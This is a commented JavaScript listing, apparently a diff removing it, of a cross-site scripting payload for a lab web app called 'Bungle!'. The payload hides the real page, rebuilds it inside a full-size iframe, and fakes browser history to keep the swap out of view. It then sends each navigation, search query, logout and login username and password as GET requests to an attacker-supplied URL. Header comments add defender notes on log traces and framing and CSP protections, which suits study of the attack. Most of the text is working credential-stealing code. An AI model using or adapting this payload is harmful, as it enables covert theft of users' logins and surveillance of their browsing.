/**
 * Script-injection payload: hides the real page, rebuilds it inside a
 * full-size iframe of "./", and reports what the user does in that frame
 * (navigation, login, logout, search) to a remote collector.
 *
 * Relies on jQuery being present on the page as `$`. How the function gets
 * into the page is not shown in this listing; the primary fix belongs at
 * that injection point.
 *
 * Defender notes, from what the code does:
 *  - Every report is a GET to `attacker` with the event serialised into the
 *    query string, so captured user names and passwords show up in proxy and
 *    web-server logs as `event=login&user=...&pass=...`.
 *  - The same serialised string is written to the browser console.
 *  - The page ends up as an emptied body holding one absolutely positioned
 *    100% x 100% iframe. A response header that forbids framing
 *    (X-Frame-Options: DENY or CSP frame-ancestors 'none') and a CSP
 *    connect-src allow-list would each interfere with a step of this.
 *
 * @param {string} attacker - URL that receives the captured events.
 */
- function payload(attacker) {
// state, forward and forwardi are declared but never read in this listing.
- var state = 1
// states: URLs shown so far; statec: index of the one currently displayed.
- var states = [];
- var statec = 0;
- var forward = [];
- var forwardi = 0
// Reporting channel: prints the serialised event, then sends it as a GET.
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
// Reports a navigation to `href` (it only logs; it does not load anything).
- function proxy(href) {
- log({event: "nav", uri: href});
- }
// The document is hidden while it is rebuilt, so the swap is not visible.
- $("html").hide();
- $(function(){
// Original body content is discarded and replaced by the iframe below.
- $("body").html("");
- var iframe = document.createElement("iframe");
- iframe.style.width = "100%";
- iframe.style.height = "100%";
- iframe.style.position = "absolute";
- document.body.appendChild(iframe);
- proxy("./");
- $("html").show()
- iframe.src = "./";
// Back/forward handling. History entries carry {s: index, first: flag}.
// Entries with `first` set are ignored; the others move statec one step and
// point the iframe at states[statec], so the address bar and the framed page
// stay in step. Each move is reported as a "nav" event.
- window.onpopstate = function(event){
- var cs = history.state
- if(cs.first)
- return
- if(cs.s <= statec){
- statec -= 1
- iframe.contentDocument.location.href = states[statec]
- iframe.src = states[statec]
- history.back()
- } else {
- statec += 1
- iframe.contentDocument.location.href = states[statec]
- iframe.src = states[statec]
- history.pushState({s: statec, first: true}, "", states[statec]);
- }
- log({event: "nav", uri: states[statec]})
- }
// Two history entries per page: a plain one and a `first` one on top of it.
- history.pushState({s:0}, "", "./")
- history.pushState({s:0, first: true}, "", "./")
- states.push("./")
// Runs after every load of the framed page and re-attaches the hooks.
- iframe.onload = function(){
// Removes links whose text contains "iframe" from #history-list in the
// framed page; presumably this hides the payload's own entry from a visible
// history list (confirm against the target markup).
- $("iframe").contents().find("#history-list a:contains(\"iframe\")", this).remove()
// One-shot delegated submit handler on the framed body: the submit is
// paused, reported according to the form's action, then re-submitted at the
// end of the handler.
- $("body", this.contentDocument).one("submit", "form", function(event){
- event.preventDefault();
- event.stopPropagation();
- switch($(this).attr("action")){
- case "./login":
// Credential capture: #username and #userpass are read before the form is sent.
- log({event: "login", user:$("#username", this).val() , pass:$("#userpass", this).val()});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- break;
- case "./logout":
// Reports the text of #logged-in-user found inside the submitted form.
- log({event: "logout", user: $("#logged-in-user", this).text()});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- break;
- case "./search":
// Reports the search query, together with the logged-in user name when the
// framed page shows one.
- var ss = $("#query", this).val()
- var u = $("iframe").contents().find("#logged-in-user", this).text()
- if(u == "")
- log({event: "nav", url: "./search?q="+ss});
- else
- log({event: "nav", user: u, url: "./search?q="+ss});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/search?q="+ss);
- history.pushState({s: statec, first: true}, "Bungle!", "/search?q="+ss);
- states.push("/search?q="+ss)
- break;
- }
// Re-submits the form after reporting.
- $(this).submit();
- });
// A click on #search-again-btn is reported as a navigation back to "./".
- $("iframe").contents().find("#search-again-btn", this).click(function(){
- proxy("./")
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- })
- }
- });
- }